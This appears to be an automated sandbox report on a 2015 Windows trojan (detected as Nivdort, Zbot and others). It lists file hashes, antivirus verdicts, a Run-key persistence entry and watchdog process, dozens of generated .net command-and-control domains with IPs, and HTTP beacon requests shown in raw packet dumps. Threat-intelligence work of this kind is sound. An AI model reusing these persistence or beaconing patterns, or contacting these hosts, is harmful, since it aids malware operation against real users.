Analysis Date2015-07-27 20:48:46
MD5c4dcc77dc5e7c02bf91923756785371f
SHA1b4e6c12c96221bd85b095b1d84cf31be1e92115b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6cbdb3bc1ca0006235e4222d99fa5ff3 sha1: 0bcb3689a6c3e0fcd722b6922eec11bfbae6c917 size: 295936
Section.rdata md5: 132926de0365285fa9af36bb1720114d sha1: fa59dc118c76a0c4f80089ec6fdc35bb9fcbb3db size: 33792
Section.data md5: 85ee09fd36df20be134ae4e3b38d7711 sha1: 64901328b3c3d719cfdab302bf0c568b9468302b size: 103424
Timestamp2014-10-30 10:26:28
PackerMicrosoft Visual C++ ?.?
PEhashc7362e3448e1cdf67464afabedf4088e8797bdb1
IMPhash64b8754bab60b6dca5d1bd4affbdde0c
AVRisingno_virus
AVMcafeeTrojan-FEMT!C4DCC77DC5E7
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Downloader-TLD [Trj]
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Kryptik.DDQD!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7no_virus
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B2.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!Trojan.Agent.Win32.546244
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. Webno_virus
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Connections Encryption SNMP Cache ➝
C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\nxlpugclxlai.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.lrb8
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe"

Network Details:

DNSsweetsmell.net
Type: A
54.246.123.138
DNSsimplehealth.net
Type: A
98.124.198.1
DNSpossibleseparate.net
Type: A
208.91.197.241
DNSmountainhealth.net
Type: A
69.64.147.249
DNSwinterclothes.net
Type: A
66.151.181.49
DNSleaveseparate.net
Type: A
95.211.230.75
DNSsweethealth.net
Type: A
50.63.202.3
DNSmaterialhealth.net
Type: A
50.63.202.57
DNSleavesmell.net
Type: A
DNSfinishearly.net
Type: A
DNSleaveearly.net
Type: A
DNSfinishsafety.net
Type: A
DNSleavesafety.net
Type: A
DNSfinishfuture.net
Type: A
DNSleavefuture.net
Type: A
DNSprobablysmell.net
Type: A
DNSsweetearly.net
Type: A
DNSprobablyearly.net
Type: A
DNSsweetsafety.net
Type: A
DNSprobablysafety.net
Type: A
DNSsweetfuture.net
Type: A
DNSprobablyfuture.net
Type: A
DNSseveralsmell.net
Type: A
DNSmaterialsmell.net
Type: A
DNSseveralearly.net
Type: A
DNSmaterialearly.net
Type: A
DNSseveralsafety.net
Type: A
DNSmaterialsafety.net
Type: A
DNSseveralfuture.net
Type: A
DNSmaterialfuture.net
Type: A
DNSseveraseparate.net
Type: A
DNSlaughseparate.net
Type: A
DNSseverahealth.net
Type: A
DNSlaughhealth.net
Type: A
DNSseveraclothes.net
Type: A
DNSlaughclothes.net
Type: A
DNSseveradistant.net
Type: A
DNSlaughdistant.net
Type: A
DNSsimpleseparate.net
Type: A
DNSmotherseparate.net
Type: A
DNSmotherhealth.net
Type: A
DNSsimpleclothes.net
Type: A
DNSmotherclothes.net
Type: A
DNSsimpledistant.net
Type: A
DNSmotherdistant.net
Type: A
DNSmountainseparate.net
Type: A
DNSpossiblehealth.net
Type: A
DNSmountainclothes.net
Type: A
DNSpossibleclothes.net
Type: A
DNSmountaindistant.net
Type: A
DNSpossibledistant.net
Type: A
DNSperhapsseparate.net
Type: A
DNSwindowseparate.net
Type: A
DNSperhapshealth.net
Type: A
DNSwindowhealth.net
Type: A
DNSperhapsclothes.net
Type: A
DNSwindowclothes.net
Type: A
DNSperhapsdistant.net
Type: A
DNSwindowdistant.net
Type: A
DNSwinterseparate.net
Type: A
DNSsubjectseparate.net
Type: A
DNSwinterhealth.net
Type: A
DNSsubjecthealth.net
Type: A
DNSsubjectclothes.net
Type: A
DNSwinterdistant.net
Type: A
DNSsubjectdistant.net
Type: A
DNSfinishseparate.net
Type: A
DNSfinishhealth.net
Type: A
DNSleavehealth.net
Type: A
DNSfinishclothes.net
Type: A
DNSleaveclothes.net
Type: A
DNSfinishdistant.net
Type: A
DNSleavedistant.net
Type: A
DNSsweetseparate.net
Type: A
DNSprobablyseparate.net
Type: A
DNSprobablyhealth.net
Type: A
DNSsweetclothes.net
Type: A
DNSprobablyclothes.net
Type: A
DNSsweetdistant.net
Type: A
DNSprobablydistant.net
Type: A
DNSseveralseparate.net
Type: A
DNSmaterialseparate.net
Type: A
DNSseveralhealth.net
Type: A
DNSseveralclothes.net
Type: A
DNSmaterialclothes.net
Type: A
HTTP GEThttp://sweetsmell.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://simplehealth.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://possibleseparate.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://mountainhealth.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://winterclothes.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://leaveseparate.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://sweethealth.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://materialhealth.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 54.246.123.138:80
Flows TCP192.168.1.1:1032 ➝ 98.124.198.1:80
Flows TCP192.168.1.1:1033 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1034 ➝ 69.64.147.249:80
Flows TCP192.168.1.1:1035 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1036 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1037 ➝ 50.63.202.3:80
Flows TCP192.168.1.1:1038 ➝ 50.63.202.57:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 77656574 736d656c   .Host: sweetsmel
0x00000070 (00112)   6c2e6e65 740d0a0d 0a                  l.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 696d706c 65686561   .Host: simplehea
0x00000070 (00112)   6c74682e 6e65740d 0a0d0a              lth.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2070 6f737369 626c6573   .Host: possibles
0x00000070 (00112)   65706172 6174652e 6e65740d 0a0d0a     eparate.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206d 6f756e74 61696e68   .Host: mountainh
0x00000070 (00112)   65616c74 682e6e65 740d0a0d 0a0d0a     ealth.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2077 696e7465 72636c6f   .Host: winterclo
0x00000070 (00112)   74686573 2e6e6574 0d0a0d0a 0a0d0a     thes.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206c 65617665 73657061   .Host: leavesepa
0x00000070 (00112)   72617465 2e6e6574 0d0a0d0a 0a0d0a     rate.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 77656574 6865616c   .Host: sweetheal
0x00000070 (00112)   74682e6e 65740d0a 0d0a0d0a 0a0d0a     th.net.........

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206d 61746572 69616c68   .Host: materialh
0x00000070 (00112)   65616c74 682e6e65 740d0a0d 0a0d0a     ealth.net......


Strings